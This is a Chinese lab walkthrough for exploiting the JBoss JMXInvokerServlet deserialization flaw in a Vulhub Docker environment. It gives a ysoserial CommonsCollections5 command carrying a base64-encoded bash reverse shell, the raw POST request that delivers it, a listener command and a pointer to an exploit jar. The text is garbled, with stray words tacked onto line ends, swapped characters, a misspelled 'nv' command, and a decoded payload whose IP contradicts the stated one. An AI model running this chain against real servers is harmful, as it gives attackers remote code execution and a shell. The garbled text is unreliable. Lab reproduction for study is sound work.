https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/html
这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet
请求中读取了用户传入的对象,而后咱们利用Apache Commons Collections中的Gadget执行任意代码。java
参考文档:git
https://blog.csdn.net/JiangBuLiu/article/details/93853056
进入路径为github
cd /root/vulhub/jboss/JMXInvokerServlet-deserialization
搭建及运行漏洞环境:web
docker-compose build && docker-compose up -d
用时:4分钟
环境启动后,访问http://your-ip:8080/
便可看到JBoss默认页面。
docker
以火狐浏览器FireFox为例,在选项
→常规
→网络设置
→设置
,将链接
中手动代理配置
的HTTP代理
,填写127.0.0.1
,端口为8080
shell
在Proxy
下Options
的Proxy Listeners
编辑监听端口为8080
并将Proxy
下Intercept
点击成Intercept is on
浏览器
JBoss在处理/invoker/JMXInvokerServlet
请求的时候读取了对象,因此咱们直接将ysoserial生成好的POC附在POST Body中发送便可。整个过程可参考jboss/CVE-2017-12149。bash
使用ysoserial来复现生成序列化数据,因为Vulhub使用的Java版本较新,因此选择使用的gadget是CommonsCollections5:网络
java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMzMzMyAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser
【注意】上面POC中{}内base64的编码原内容为bash -i >& /dev/tcp/192.168.236.138/3333 0>&1
【注意注意】!!!ysoserial不要用Powershell!!!必定要用cmd!!!
生成好的POC文件.ser,将这个文件做为POST Body发送至/invoker/JMXInvokerServlet
便可:
POST /invoker/JMXInvokerServlet HTTP/1.1 Host: 192.168.236.138:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-java-serialized-object Content-Length: 4240 【右击选择上传文件,选中POC上传】
好比我POC中的命令是监听端口,那么就检测对应端口
nv -lvnp [端口号]
网上已经有不少EXP了,好比DeserializeExploit.jar
直接用该工具执行命令、上传文件便可: